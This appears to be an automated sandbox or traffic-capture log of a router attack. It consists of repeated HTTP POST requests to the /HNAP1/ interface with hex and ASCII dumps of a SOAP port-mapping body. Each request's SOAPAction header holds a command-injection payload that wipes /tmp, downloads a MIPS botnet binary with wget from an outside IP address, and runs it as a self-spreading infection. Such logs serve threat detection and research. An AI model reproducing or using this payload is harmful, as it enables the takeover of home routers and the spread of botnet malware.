3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 